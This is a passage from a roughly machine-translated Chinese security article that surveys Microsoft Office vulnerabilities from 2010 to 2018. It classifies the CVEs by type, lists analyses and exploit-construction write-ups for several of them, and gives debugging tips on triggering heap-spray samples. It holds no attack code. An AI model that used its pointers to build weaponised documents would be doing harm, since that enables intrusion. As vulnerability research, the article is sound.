For a summary of the Flash vulnerabilities, refer to other researchers' articles. \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOut-of-bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nUse after free(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext, following the second table above and leaving the Flash vulnerabilities aside, we look at these vulnerabilities one by one. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThis vulnerability was found by wushi, head of the Cohen laboratory. It is a stack overflow vulnerability. \nThere are many analysis articles on this vulnerability on the see snow forum; the following are a few of them. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nChapter 2, Section 4 of The Vulnerability War also gives a fairly systematic description of this vulnerability; interested readers can read the relevant chapters. \nCVE-2014-1761 \nThis vulnerability is a 0day found by Google. It is a heap out-of-bounds write vulnerability. \nLi Haifei did a very thorough analysis of this vulnerability. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nThe see snow forum also has two high-quality analysis articles on this vulnerability. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761) study notes, which mention how to configure the correct environment \nThe security agent also has a high-quality analysis of this vulnerability. 
\nTeaching you hand in hand how to construct Office exploit EXP\uff08part three\uff09 \nIn addition, South Korea's AhnLab also published a report on this vulnerability. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nWhen debugging this vulnerability, note that some samples have rather strict requirements on the triggering environment; the article mentions how to build a suitable experimental environment. \nCVE-2016-7193 \nThis vulnerability is a 0day that the Austrian Military Cyber Emergency Readiness Team reported to Microsoft. \nIt is also a heap out-of-bounds write vulnerability. \nBaidu Security Labs has done a fairly complete analysis of this vulnerability. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI have also shared an article analysing how this vulnerability is exploited. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle's 0day summary table lists this as one of the 0days of 2015. \nThis is a type confusion vulnerability. \nThe fly tower has written an analysis article about this vulnerability. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe has also written a thorough analysis of this vulnerability. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has a thorough analysis of this vulnerability. \nTeaching you hand in hand how to construct Office exploit EXP\uff08part four\uff09 \nThe Know Chong Yu 404 lab also wrote a thorough analysis article on this vulnerability. \nCVE-2015-1641 Word using the sample analysis \nI have also written an article on the principles of this vulnerability. 
\nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": 
"2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}